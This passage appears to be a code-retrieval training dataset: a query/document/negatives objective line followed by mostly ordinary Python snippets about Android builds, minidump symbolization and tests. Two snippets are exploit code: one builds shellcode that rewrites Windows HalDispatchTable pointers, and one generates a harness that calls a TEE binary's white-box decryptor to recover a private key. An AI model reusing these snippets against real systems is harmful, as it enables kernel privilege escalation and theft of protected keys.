        platform.system().lower(), platform.machine(), dump_finder,
        build_dir, symbols_dir=symbols_dir)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def obfuscate():\r\n smali_file_list = u.load_smali_file() # Load smali files\r\n set()\r\n change_all_direct_method(\r\n set(\r\n find_all_direct_method(\r\n list(u.get_android_method_names()) + list(set(find_all_native_method(smali_file_list))),\r\n smali_file_list\r\n )\r\n ),\r\n smali_file_list,\r\n set(\r\n find_all_landroid_ljava_over(\r\n smali_file_list\r\n )\r\n )\r\n )", "def android_patch() -> None:\n fname = 'src/cpython/Modules/Setup.dist'\n txt = efrotools.readfile(fname)\n\n # Need to switch some flags on this one.\n txt = efrotools.replace_one(txt, '#zlib zlibmodule.c',\n 'zlib zlibmodule.c -lz\\n#zlib zlibmodule.c')\n # Just turn all these on.\n for enable in [\n '#array arraymodule.c', '#cmath cmathmodule.c _math.c',\n '#math mathmodule.c', '#_contextvars _contextvarsmodule.c',\n '#_struct _struct.c', '#_weakref _weakref.c',\n '#_testcapi _testcapimodule.c', '#_random _randommodule.c',\n '#_elementtree -I', '#_pickle _pickle.c',\n '#_datetime _datetimemodule.c', '#_bisect _bisectmodule.c',\n '#_heapq _heapqmodule.c', '#_asyncio _asynciomodule.c',\n '#unicodedata unicodedata.c', '#fcntl fcntlmodule.c',\n '#select selectmodule.c', '#_csv _csv.c',\n '#_socket socketmodule.c', '#_blake2 _blake2/blake2module.c',\n '#binascii binascii.c', '#_posixsubprocess _posixsubprocess.c',\n '#_sha3 _sha3/sha3module.c'\n ]:\n txt = efrotools.replace_one(txt, enable, enable[1:])\n if ENABLE_OPENSSL:\n txt = efrotools.replace_one(txt, '#_ssl _ssl.c \\\\',\n '_ssl _ssl.c -DUSE_SSL -lssl -lcrypto')\n else:\n # Note that the _md5 and _sha modules are normally only built if the\n # system does not have the OpenSSL libs containing an optimized\n # version.\n for enable in [\n '#_md5 md5module.c', '#_sha1 sha1module.c',\n '#_sha256 sha256module.c', '#_sha512 sha512module.c'\n ]:\n txt = efrotools.replace_one(txt, enable, enable[1:])\n\n # Turn this off (its just an example module).\n txt = efrotools.replace_one(txt, 'xxsubtype xxsubtype.c',\n '#xxsubtype xxsubtype.c')\n\n # For whatever reason this stuff isn't in there at all; add it.\n txt += '\\n_json _json.c\\n'\n\n txt += '\\n_lzma _lzmamodule.c -llzma\\n'\n\n txt += ('\\n_sqlite3 -I$(srcdir)/Modules/_sqlite'\n ' -DMODULE_NAME=\\'\\\\\"sqlite3\\\\\"\\' -DSQLITE_OMIT_LOAD_EXTENSION'\n ' -lsqlite3 \\\\\\n'\n ' _sqlite/cache.c \\\\\\n'\n ' _sqlite/connection.c \\\\\\n'\n ' _sqlite/cursor.c \\\\\\n'\n ' _sqlite/microprotocols.c \\\\\\n'\n ' _sqlite/module.c \\\\\\n'\n ' _sqlite/prepare_protocol.c \\\\\\n'\n ' _sqlite/row.c \\\\\\n'\n ' _sqlite/statement.c \\\\\\n'\n ' _sqlite/util.c\\n')\n\n if ENABLE_OPENSSL:\n txt += '\\n\\n_hashlib _hashopenssl.c -DUSE_SSL -lssl -lcrypto\\n'\n\n txt += '\\n\\n*disabled*\\n_ctypes _crypt grp'\n\n efrotools.writefile(fname, txt)\n\n # Ok, this is weird.\n # When applying the module Setup, python looks for any line containing *=*\n # and interprets the whole thing a a global define?...\n # This breaks things for our static sqlite compile above.\n # The check used to look for [A-Z]*=* which didn't break, so let' just\n # change it back to that for now.\n fname = 'src/cpython/Modules/makesetup'\n txt = efrotools.readfile(fname)\n txt = efrotools.replace_one(\n txt, '\t\t*=*)\tDEFS=\"$line$NL$DEFS\"; continue;;',\n '\t\t[A-Z]*=*)\tDEFS=\"$line$NL$DEFS\"; continue;;')\n efrotools.writefile(fname, txt)\n\n print('APPLIED EFROTOOLS ANDROID BUILD PATCHES.')", "def _binaries_to_symbolize(self):\n raise NotImplementedError()", "def obfuscate():\n smali_file_list = u.load_smali_file() # Load smali files\n 
change_all_field(set(find_all_field(smali_file_list)), smali_file_list, set(find_all_landroid_ljava_over(smali_file_list)))", "def test_llvm_strip(self):\n self.assertEqual(\n self.ndk.llvm_strip,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-strip\",\n )", "def get_apk(self):", "def test_llvm_objdump(self):\n self.assertEqual(\n self.ndk.llvm_objdump,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-objdump\",\n )", "def _boilerplate_to_python(indent):\n indent_str = \" \" * indent\n boilerplate = indent_str + \"import core.vba_library\\n\"\n boilerplate = indent_str + \"import core.vba_context\\n\"\n boilerplate += indent_str + \"from core.utils import safe_print\\n\"\n boilerplate += indent_str + \"from core.utils import safe_str_convert\\n\"\n boilerplate += indent_str + \"from core.utils import plus\\n\"\n boilerplate += indent_str + \"from core.utils import eq\\n\"\n boilerplate += indent_str + \"from core.utils import neq\\n\"\n boilerplate += indent_str + \"from core.utils import lt\\n\"\n boilerplate += indent_str + \"from core.utils import lte\\n\"\n boilerplate += indent_str + \"from core.utils import gt\\n\"\n boilerplate += indent_str + \"from core.utils import gte\\n\"\n boilerplate += indent_str + \"import core.utils\\n\"\n boilerplate += indent_str + \"from core.python_jit import update_array\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_num\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_int\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_str\\n\"\n boilerplate += indent_str + \"from core.vba_conversion import coerce_to_int_list\\n\\n\"\n boilerplate += indent_str + \"try:\\n\"\n boilerplate += indent_str + \" \" * 4 + \"vm_context\\n\"\n boilerplate += indent_str + \"except (NameError, UnboundLocalError):\\n\"\n boilerplate += indent_str + \" \" * 4 + \"vm_context = context\\n\"\n return boilerplate", "def test_GetSymbolMapping_normalize(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/.//myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def __init__(self, static_lib):\n # TODO: Support dump for reading symbols from static libraries\n assert not static_lib and \"static libs not yet supported with dump\"\n self.tool = self.find_tool()\n if self.tool is None:\n print(\"ERROR: Could not find dump\")\n sys.exit(1)\n self.flags = ['-n', '-v']\n object_mode = environ.get('OBJECT_MODE')\n if object_mode == '32':\n self.flags += ['-X32']\n elif object_mode == '64':\n self.flags += ['-X64']\n else:\n self.flags += ['-X32_64']", "def test_py2hex_minify_arg():\n with mock.patch('uflash.flash') as mock_flash:\n uflash.py2hex(argv=['tests/example.py', '-m'])\n mock_flash.assert_called_once_with(path_to_python='tests/example.py',\n path_to_runtime=None,\n paths_to_microbits=['tests'],\n minify=True,\n keepname=True)", "def _GetSymbolBinaryDirectory(self, minidump, libraries):\n if minidump in self._minidump_symbol_binaries_directories:\n return self._minidump_symbol_binaries_directories[minidump]\n\n # Get the processor architecture reported by the minidump.\n arch = None\n matcher = re.compile(_PROCESSOR_ARCH_REGEX)\n for line in 
self._GetMinidumpDumpOutput(minidump).splitlines():\n match = matcher.match(line)\n if match:\n arch = match.groupdict()['arch'].lower()\n break\n if not arch:\n logging.error('Unable to find processor architecture for minidump %s',\n minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n if arch not in _BREAKPAD_ARCH_TO_FILE_REGEX:\n logging.error(\n 'Unsupported processor architecture %s for minidump %s. This is '\n 'likely fixable by adding the correct mapping for the architecture '\n 'in android_minidump_symbolizer._BREAKPAD_ARCH_TO_FILE_REGEX.',\n arch, minidump)\n self._minidump_symbol_binaries_directories[minidump] = None\n return None\n\n # Look for a directory that contains binaries with the correct architecture.\n matcher = re.compile(_BREAKPAD_ARCH_TO_FILE_REGEX[arch])\n symbol_dir = None\n for symbol_subdir in _POSSIBLE_SYMBOL_BINARY_DIRECTORIES:\n possible_symbol_dir = os.path.join(self._build_dir, symbol_subdir)\n if not os.path.exists(possible_symbol_dir):\n continue\n for f in os.listdir(possible_symbol_dir):\n if f not in libraries:\n continue\n binary_path = os.path.join(possible_symbol_dir, f)\n stdout = subprocess.check_output(\n ['file', binary_path], stderr=subprocess.STDOUT)\n if matcher.match(stdout):\n symbol_dir = possible_symbol_dir\n break\n\n if not symbol_dir:\n logging.error(\n 'Unable to find suitable symbol binary directory for architecture %s.'\n 'This is likely fixable by adding the correct directory to '\n 'android_minidump_symbolizer._POSSIBLE_SYMBOL_BINARY_DIRECTORIES.',\n arch)\n self._minidump_symbol_binaries_directories[minidump] = symbol_dir\n return symbol_dir", "def applyDemapping(self):\n pass", "def _clean_amm_swaps(cursor: 'DBCursor') -> None:\n log.debug('Enter _clean_amm_swaps')\n cursor.execute('DELETE FROM used_query_ranges WHERE name LIKE \"uniswap_trades%\";')\n cursor.execute('DELETE FROM used_query_ranges WHERE name LIKE \"sushiswap_trades%\";')\n cursor.execute('DELETE FROM used_query_ranges WHERE name LIKE \"balancer_trades%\";')\n cursor.execute('DROP VIEW IF EXISTS combined_trades_view;')\n cursor.execute('DROP TABLE IF EXISTS amm_swaps;')\n log.debug('Exit _clean_amm_swaps')", "def test_GetSymbolMapping_simple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def retore_hal_ptrs(HalDispatchTable,HaliQuerySystemInformation,HalpSetSystemInformation):\n\tif HaliQuerySystemInformation == 0x0 or HalpSetSystemInformation == 0x0:\n\t\treturn \"\"\n\telse:\n\t\tshellcode = (\n\t\t\"\\x31\\xc0\"\n\t\t\"\\xb8\" + struct.pack(\"L\", HalpSetSystemInformation) +\n\t\t\"\\xa3\" + struct.pack(\"L\", HalDispatchTable + 0x8) +\n\t\t\"\\xb8\" + struct.pack(\"L\", HaliQuerySystemInformation) +\n\t\t\"\\xa3\" + struct.pack(\"L\", HalDispatchTable + 0x4)\n\t\t)\n\t\n\t\treturn shellcode", "def test_llvm_readelf(self):\n self.assertEqual(\n self.ndk.llvm_readelf,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-readelf\",\n )", "def c_code_cache_version(self):\r\n return ()", "def c_code_cache_version(self):\r\n return ()", "def swint(self) -> None:", "def main():\n\n dest_dir = sys.argv[1:][0] or '.'\n print 'Writing logs to: ' + dest_dir\n\n device_id 
= sys.argv[1:][1] or null\n print 'Using device_id: ' + device_id\n\n # Organize test output by device in case multiple devices are being tested.\n dest_dir = os.path.join(dest_dir, \"perftesting\", device_id)\n\n android_home = os.environ['ANDROID_HOME']\n print 'Your ANDROID_HOME is set to: ' + android_home\n # Uncomment this next line to hardcode your android_home if you can't set\n # it in your environment.\n # android_home = '/full/path/to/android/sdk'\n\n platform_tools = os.path.join(android_home, 'platform-tools')\n current_path = os.environ.get('PATH', '')\n os.environ['PATH'] = (platform_tools if current_path == '' else current_path +\n os.pathsep + platform_tools)\n\n if not os.path.isdir(android_home):\n print 'Your ANDROID_HOME path do not appear to be set in your environment'\n sys.exit(1)\n\n # Your SDK path. Adjust this to your needs.\n sdk_path = android_home\n\n # sets a variable with the package's internal name\n package_name = 'es.developer.achambi.pkmng'\n\n clean_test_files(dest_dir)\n\n # Connects to the current device, returning a MonkeyDevice object\n print 'Waiting for a device to be connected.'\n device = MonkeyRunner.waitForConnection(5, device_id)\n print 'Device connected.'\n\n # Protip1: Remove the screen lock on your test devices then uncomment\n # this like and the same one farther down. This will prevent you from\n # worrying about whether your device display has gone to sleep.\n # Alternatively, you can use the \"never sleep when charging\" developer\n # ption.\n # device.press(\"KEYCODE_POWER\", \"DOWN_AND_UP\")\n\n enable_dump_permission(sdk_path, device_id, dest_dir, package_name)\n enable_storage_permission(sdk_path, device_id, dest_dir, package_name)\n\n open_app(device, package_name)\n\n # Clear the dumpsys data for the next run must be done immediately\n # after open_app().\n reset_graphics_dumpsys(device, package_name)\n\n run_tests_and_systrace(sdk_path, device, device_id, dest_dir,\n package_name)\n\n # Device files could be in either location on various devices.\n pull_device_data_files(sdk_path, device_id,\n '/storage/emulated/0/Android/data/',\n dest_dir, package_name, '1')\n pull_device_data_files(sdk_path, device_id,\n '/storage/emulated/legacy/Android/data/',\n dest_dir, package_name, '2')\n\n # Protip1: See comment above.\n # device.press(\"KEYCODE_POWER\", \"DOWN_AND_UP\")\n\n analyze_data_files(dest_dir)", "def testPullMinidumps(self):\n def GetDumpLocation(_=None):\n return '/sdcard/dumps/'\n\n platform_backend = self._browser_backend.platform_backend\n time_offset = platform_backend.GetDeviceHostClockOffset()\n platform_backend.GetDumpLocation = GetDumpLocation\n remote_path = posixpath.join(GetDumpLocation(), 'Crashpad', 'pending')\n self._browser_backend.device.RunShellCommand(['mkdir', '-p', remote_path])\n # Android's implementation of \"touch\" doesn't support setting time via\n # Unix timestamps, only via dates, which are affected by timezones. So,\n # figure out what the device's timestamp for January 2nd, 1970 is and use\n # that to calculate the expected local timestamp. 
January 2nd is used\n # instead of January 1st so that we can't get accidentally get a negative\n # timestamp if the host-device clock offset is negative.\n remote_dump_file = posixpath.join(remote_path, 'test_dump')\n self._browser_backend.device.RunShellCommand(\n ['touch', '-d', '1970-01-02T00:00:00', remote_dump_file])\n device_mtime = self._browser_backend.device.RunShellCommand(\n ['stat', '-c', '%Y', remote_dump_file], single_line=True)\n device_mtime = int(device_mtime.strip())\n try:\n self._browser_backend.PullMinidumps()\n finally:\n self._browser_backend.device.RemovePath(GetDumpLocation(), recursive=True)\n\n local_path = os.path.join(\n self._browser_backend._tmp_minidump_dir, 'test_dump')\n self.assertTrue(os.path.exists(local_path))\n self.assertEqual(os.path.getmtime(local_path), device_mtime - time_offset)", "def sanitize(info):\n if \"processor\" in info and info[\"processor\"] == \"universal-x86-x86_64\":\n # If we're running on OS X 10.6 or newer, assume 64-bit\n if release[:4] >= \"10.6\": # Note this is a string comparison\n info[\"processor\"] = \"x86_64\"\n info[\"bits\"] = 64\n else:\n info[\"processor\"] = \"x86\"\n info[\"bits\"] = 32", "def get_field_deserializers(self,) -> Dict[str, Callable[[ParseNode], None]]:\n from .android_required_password_type import AndroidRequiredPasswordType\n from .device_compliance_policy import DeviceCompliancePolicy\n from .device_threat_protection_level import DeviceThreatProtectionLevel\n\n from .android_required_password_type import AndroidRequiredPasswordType\n from .device_compliance_policy import DeviceCompliancePolicy\n from .device_threat_protection_level import DeviceThreatProtectionLevel\n\n fields: Dict[str, Callable[[Any], None]] = {\n \"deviceThreatProtectionEnabled\": lambda n : setattr(self, 'device_threat_protection_enabled', n.get_bool_value()),\n \"deviceThreatProtectionRequiredSecurityLevel\": lambda n : setattr(self, 'device_threat_protection_required_security_level', n.get_enum_value(DeviceThreatProtectionLevel)),\n \"minAndroidSecurityPatchLevel\": lambda n : setattr(self, 'min_android_security_patch_level', n.get_str_value()),\n \"osMaximumVersion\": lambda n : setattr(self, 'os_maximum_version', n.get_str_value()),\n \"osMinimumVersion\": lambda n : setattr(self, 'os_minimum_version', n.get_str_value()),\n \"passwordExpirationDays\": lambda n : setattr(self, 'password_expiration_days', n.get_int_value()),\n \"passwordMinimumLength\": lambda n : setattr(self, 'password_minimum_length', n.get_int_value()),\n \"passwordMinutesOfInactivityBeforeLock\": lambda n : setattr(self, 'password_minutes_of_inactivity_before_lock', n.get_int_value()),\n \"passwordPreviousPasswordBlockCount\": lambda n : setattr(self, 'password_previous_password_block_count', n.get_int_value()),\n \"passwordRequired\": lambda n : setattr(self, 'password_required', n.get_bool_value()),\n \"passwordRequiredType\": lambda n : setattr(self, 'password_required_type', n.get_enum_value(AndroidRequiredPasswordType)),\n \"securityBlockJailbrokenDevices\": lambda n : setattr(self, 'security_block_jailbroken_devices', n.get_bool_value()),\n \"securityDisableUsbDebugging\": lambda n : setattr(self, 'security_disable_usb_debugging', n.get_bool_value()),\n \"securityPreventInstallAppsFromUnknownSources\": lambda n : setattr(self, 'security_prevent_install_apps_from_unknown_sources', n.get_bool_value()),\n \"securityRequireCompanyPortalAppIntegrity\": lambda n : setattr(self, 'security_require_company_portal_app_integrity', n.get_bool_value()),\n 
\"securityRequireGooglePlayServices\": lambda n : setattr(self, 'security_require_google_play_services', n.get_bool_value()),\n \"securityRequireSafetyNetAttestationBasicIntegrity\": lambda n : setattr(self, 'security_require_safety_net_attestation_basic_integrity', n.get_bool_value()),\n \"securityRequireSafetyNetAttestationCertifiedDevice\": lambda n : setattr(self, 'security_require_safety_net_attestation_certified_device', n.get_bool_value()),\n \"securityRequireUpToDateSecurityProviders\": lambda n : setattr(self, 'security_require_up_to_date_security_providers', n.get_bool_value()),\n \"securityRequireVerifyApps\": lambda n : setattr(self, 'security_require_verify_apps', n.get_bool_value()),\n \"storageRequireEncryption\": lambda n : setattr(self, 'storage_require_encryption', n.get_bool_value()),\n }\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields", "def _debugmallocstats(): # real signature unknown; restored from __doc__\n pass", "def _magic_bgmt(self, s):\n s = s.strip()\n if idapy._d is None:\n print \"Please select a dump first. Example:\"\n print \"sel t2i\"\n return\n a = addr_from_magic_string(s, rounded_32bit = False)\n f = idapy._d.Fun(\"gui_massive_event_loop\")\n r = find_refs(idapy._d, a, f.addr)\n \n for a,v in r:\n bkt.back_deco(a)\n \n print r", "def _fix_up(self, cls, code_name):", "def dump_proc_self_maps():\n return", "def _assemble_smali(self, dest, source):\n try:\n subprocess.check_call(['smali', 'a', source, '-o', dest])\n except EnvironmentError:\n self.skipTest('smali not available')", "def StripPC(addr):\n global ARCH\n if ARCH == \"arm\":\n return addr & ~1\n return addr", "def __init__(self, line, a_v):\n # If this is an old-style process line (Android<=6.0)\n if a_v == \"6.0\" or (a_v[0].isdigit() and (int(a_v[0])) < 6):\n if not Process.correct_line_6_0.match(line):\n raise ValueError('Bad process \"{}\"'.format(line))\n p = line.split(None, 4)\n self._context = Context(p[0])\n self._user = p[1]\n self._pid = p[2]\n self._ppid = p[3]\n self._name = p[4]\n # If this is a new-style process line (Android>=6.0.1)\n elif a_v == \"6.0.1\" or Process.SUPPORT_NEWER_VERSIONS:\n if not Process.correct_line_6_0_1.match(line):\n raise ValueError('Bad process \"{}\"'.format(line))\n p = line.split(None, 9)\n self._context = Context(p[0])\n self._user = p[1]\n self._pid = p[2]\n self._ppid = p[3]\n self._vsize = p[4]\n self._rss = p[5]\n self._wchan = p[6]\n self._pc = p[7]\n self._status = p[8]\n self._name = p[9]\n else:\n raise NotImplementedError(\"Unsupported Android version.\")", "def cache_code(self):\n\n # Generate the prologue\n self._synthesize_prologue()\n\n # Don't have a real epilogue.\n self.add(spu.stop(0x2000))\n # self._check_alignment(self._code, 'spu code')\n\n # self.exec_module.make_executable(self._code.buffer_info()[0], len(self._code))\n\n # Append our instructions to the prologue's, first making sure the alignment is correct.\n if len(self._prologue._code) % 2 == 1: # Odd number of instructions\n self._prologue.add(spu.lnop(0))\n\n self._prologue._code.extend(self._code)\n self._prologue._check_alignment(self._prologue._code, 'spu prologue')\n \n self._epilogue = self \n self._cached = True\n return", "def test_GetSymbolMapping_multiple_match(self):\n lines = [\"This is a test case\\n\", \"Caching all mojo apps\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n \"https://apps.mojo/myapp.mojo at /path/to/myapp.mojo/.lM03ws\",\n \"I/mojo(2): [INFO:somefile.cc(85)] Caching mojo app \"\n 
\"https://apps.mojo/otherapp.mojo at /path/to/otherapp.mojo/.kW07s\"]\n golden_dict = {\n \"/path/to/myapp.mojo/.lM03ws\": \"libmyapp_library.so\",\n \"/path/to/otherapp.mojo/.kW07s\": \"libotherapp_library.so\"\n }\n actual_dict = stack_utils.GetSymbolMapping(lines)\n self.assertDictEqual(golden_dict, actual_dict)", "def test_universal64_dsym(self):\n self.build(debug_info=\"dsym\", dictionary={'FAT64_DSYM': '1'})\n self.do_test()", "def test_amd64(self):\n self.do_test(\"2lwp_t2_SIGSEGV.amd64\", pid=622, region_count=24)", "def test_amd64(self):\n self.do_test(\"2lwp_process_SIGSEGV.amd64\", pid=665, region_count=24)", "def obfuscate(self):\n self.split_ir()\n self.minimize_ir() # doesn't always work\n self.translate_ir()", "def get_match_line(smali_line, android_method_list, is_rename):\r\n method_match = re.search(r'^([ ]*?)\\.method(.*?) (?P<invokeMethod>([^ ]*?))\\((?P<invokePass>(.*?))\\)(?P<invokeReturn>(.*?))$', smali_line) # Match a method definition\r\n if method_match is None:\r\n print smali_line, # Otherwise print back the line unchanged\r\n return None # Return None\r\n method_name = method_match.group('invokeMethod') # Recover the method name\r\n if method_name not in android_method_list: # For non SDK method\r\n if is_rename:\r\n print smali_line.replace(method_name + '(', crypt_identifier(method_name) + '('), # Append\r\n else:\r\n print smali_line,\r\n return method_name # Return the method name\r\n else:\r\n print smali_line, # Otherwise print back the line unchanged\r\n return None # Return None\r", "def test_universal64_dsym(self):\n self.build(debug_info=\"dsym\", dictionary={\"FAT64_DSYM\": \"1\"})\n self.do_test()", "def make_codes(self):\n\t\troot = heapq.heappop(self.heap)#obtenemos la raiz del arbol\n\t\tcurrent_code = \"\"\n\t\tself.make_codes_helper(root, current_code)", "def clearDumpDescCallbacks(self):\n pass", "def _compat_parse_magic(self):\n def warning(magic, option):\n LOG.warning(\"Deprecated \\\"magic\\\" option \\\"{m}\\\" found. Please use new-style option \\\"{o}\\\" instead (see user manual).\".format(m=magic, o=option))\n\n magic_auto_backports = re.search(r\"\\*\\s*MINI_BUILDD:\\s*AUTO_BACKPORTS:\\s*([^*.\\[\\]]+)\", self._top_changes)\n if magic_auto_backports:\n warning(\"AUTO_BACKPORTS\", \"auto-ports\")\n self._set(\"auto-ports\", magic_auto_backports.group(1))\n\n magic_backport_mode = re.search(r\"\\*\\s*MINI_BUILDD:\\s*BACKPORT_MODE\", self._top_changes)\n if magic_backport_mode:\n warning(\"BACKPORT_MODE\", \"ignore-lintian\")\n self._set(\"ignore-lintian\", \"true\")", "def dump_compiler(input_bytes):\n return dump_from_release(input_bytes, \"compiler\")", "def fiddle_with_flags():\n flags['c++'] += '-arch x86_64 -bundle'\n flags['c'] += '-arch x86_64'", "def do_minify(self):\n if shared.Settings.SPLIT_MEMORY:\n # must be done before minification\n self.queue += ['splitMemory', 'simplifyExpressions']\n\n if self.opt_level >= 2:\n if self.debug_level < 2 and not self.use_closure_compiler == 2:\n self.queue += ['minifyNames']\n if self.debug_level == 0:\n self.minify_whitespace = True\n\n if self.use_closure_compiler == 1:\n self.queue += ['closure']\n elif self.debug_level <= 2 and shared.Settings.FINALIZE_ASM_JS and not self.use_closure_compiler:\n self.cleanup_shell = True", "def GenerateHelperFunctions(self, out):\n out.Write(\"\"\"/* Use local strcmp to avoid dependency on libc. 
*/\nstatic int mystrcmp(const char* s1, const char *s2) {\n while (1) {\n if (*s1 == 0) break;\n if (*s2 == 0) break;\n if (*s1 != *s2) break;\n ++s1;\n ++s2;\n }\n return (int)(*s1) - (int)(*s2);\n}\\n\n\"\"\")", "def set_xml_fetch_method(self, use_xml_dumper):\n self.android_device_driver.use_xml_dumper = use_xml_dumper", "def snapshot(device):\n cmds = \"\"\n if device.model in ['9500', '4500']:\n cmds += \"\"\"\nshow users\nshow version\nshow vlan brief\nshow interfaces status\nshow ip interface brief\nshow ip route summary\nshow ipv6 interface brief\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow bgp ipv4 unicast summary\nshow bgp ipv6 unicast summary\nshow ip arp\nshow mac address-table\nshow running-config\n\"\"\"\n elif device.model == '3850':\n cmds += \"\"\"\nshow users\nshow version\nshow vlan brief\nshow interfaces status\nshow ip interface brief\nshow ip route summary\nshow ip arp\nshow mac address-table\nshow running-config\n\"\"\"\n elif device.model == 'E6000':\n cmds += \"\"\"\nshow users\nshow version\nshow linecard status\nshow ip interface brief\nshow ip route summary\nshow ipv6 interface brief\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbor\nshow bgp ipv4 summary\nshow bgp ipv6 summary\nshow ip route rip\nshow cable modem summary mac\nshow cable modem\nshow cable modem detail\nshow video sessions\nshow video sessions summary\nshow running-config verbose\n\"\"\"\n elif device.model == 'C100G':\n cmds += \"\"\"\nshow user current\nshow version\nshow chassis status\nshow ip interface brief\nshow ip route summary\nshow ipv6 interface brief\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow ip bgp summary\nshow ipv6 bgp summary\nshow ip route rip\nshow cable modem docsis-mac summary\nshow cable modem verbose\nshow cable modem cpe\nshow video session all brief\nshow video session all summary\nshow running-config\n\"\"\"\n elif device.model == 'CBR8':\n cmds += \"\"\"\nshow users\nshow version\nshow platform\nshow ip interface brief | exclude unset\nshow ip route summary\nshow ipv6 interface brief | exclude unass|^Cable|^Video|^In|^Wideband|^Dti|^VirtualPortGroup\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow bgp ipv4 unicast summary\nshow bgp ipv6 unicast summary\nshow ip route rip\nshow cable modem summary total\nshow cable modem verbose\nshow cable video session all\nshow cable video session all summary\nshow running-config\n\"\"\"\n elif device.model in ['9504N', '9516']:\n cmds += \"\"\"\nshow users\nshow version\nshow ip interface brief | exclude unass\nshow ip route summary\nshow ipv6 interface brief\nshow ipv6 route summary\nshow ip mroute\nshow ip ospf neighbor\nshow isis neighbors\nshow bgp ipv4 unicast summary\nshow bgp ipv6 unicast summary\nshow ip route rip\nshow cable modem summary\nshow cable modem\nshow running-config\n\"\"\"\n elif device.model == '7360':\n cmds += \"\"\"\nshow session\nshow software-mngt oswp\nshow router interface summary\nshow router ospf neighbor\nshow router isis interface\nshow router bgp summary family ipv4\nshow router bgp summary family ipv6\nshow router status\nshow router route-table ipv4 summary\nshow router route-table ipv6 summary\nshow cable modem summary total\nshow cable modem\ninfo configure\n\"\"\"\n elif device.model == 'GAC':\n cmds += \"\"\"\nshow users | nomore\nshow version | tab | nomore\nshow router ospf 0 neighbor | nomore\nshow router isis 0 interface | nomore\nshow router bgp 
summary | nomore\nshow router rip database | nomore\nshow router route-table ipv4 summary | nomore\nshow router route-table ipv6 summary | nomore\nshow cable modem brief | tab | nomore\nshow cable modem cpe | tab | nomore\nshow configuration | display set | nomore\n\"\"\"\n return device.get_response(p.string_to_array(cmds), timeout=300, expect=r\"(?m)^(\\r)?(\\x1b\\[(\\?7h|K))?(\\*)?([)?([\\w\\-/]+[@:])?[\\w\\-]+(\\[A/U\\])?(\\([ \\w\\-]+\\))?([ :]~)?(])?(>([\\w\\-]+)+>)?(>)?([\\w\\-]+>)*[$#>%]\")", "def test_llvm_ar(self):\n self.assertEqual(\n self.ndk.llvm_ar,\n f\"/opt/android/android-ndk/toolchains/llvm/prebuilt/{self.ndk.host_tag}/bin/llvm-ar\",\n )", "def gencode(globaltask):\n\n with open(globaltask) as f:\n data = f.read()\n\n # Find begin of symbol name string table (located at the end)\n string_table_begin = find_string_table_begin(data)\n strings = data[string_table_begin:]\n # Read out symbols\n sym_map = {}\n try:\n # Load symbols\n for i in range(1, 100000):\n idx = string_table_begin - 16 * i\n strings_off = u32(data[idx:idx+4])\n addr = u32(data[idx+4:idx+8])\n size = u32(data[idx+8:idx+12])\n type = u32(data[idx+12:idx+16])\n sym_name = strings[strings_off:strings.index('\\x00', strings_off)]\n if addr == 0 or not sym_name.endswith('.c'):\n sym_map[sym_name] = addr\n except ValueError:\n pass\n\n if len(sym_map) == 0:\n raise GlobaltaskGenCodeException(\"Could not get symbols.\")\n\n # Generate C code\n ccode = \"\"\"\n #include <stdio.h>\n #include <sys/mman.h>\n #include <string.h>\n #include <stdint.h>\n \"\"\"\n ccode += '__attribute__((aligned(0x100000))) unsigned char data[] = {\\n'\n for i in range(0, len(data), 30):\n ccode += ' '\n for c in data[i:i+30]:\n ccode += str(u8(c)) + ','\n ccode += '\\n'\n ccode += '};\\n'\n ccode += \"\"\"\n void mydump(const char *desc, const char *buf, int len) {\n if (desc) {\n printf(\"%s = '\", desc);\n } else {\n printf(\"'\");\n }\n for (int i = 0; i < len; ++i) {\n printf(\"\\\\\\\\x%02x\", buf[i]);\n }\n printf(\"'\\\\n\");\n }\n\n int main() {\n // Make pages read write executable\n mprotect(data, sizeof(data), PROT_READ | PROT_WRITE | PROT_EXEC);\n\n // Fix .got table, as there is an absolute table_zygote_ptr used by wb_decrypt_key\n uint32_t *got_table = (uint32_t*)(data + \"\"\" + hex(sym_map['TEE_GOT_START']) + \"\"\");\n uint32_t *got_table_end = (uint32_t*)(data + \"\"\" + hex(sym_map['TEE_GOT_END']) + \"\"\");\n for (uint32_t *entry = got_table; entry != got_table_end; ++entry) {\n if (*entry)\n *entry += (uint32_t)data;\n }\n\n char *ciphertext1 = data + \"\"\" + hex(sym_map['ciphertext1']) + \"\"\";\n char *ciphertext2 = data + \"\"\" + hex(sym_map['ciphertext2']) + \"\"\";\n char*(*wb_decrypt_key)(char *, char *, unsigned int) = ((char*(*)(char*, char*, unsigned int))(data + \"\"\" + hex(sym_map['wb_decrypt_key']) + \"\"\"));\n\n // Decrypt private key\n char buf[4096] = {0};\n wb_decrypt_key(ciphertext1, buf, 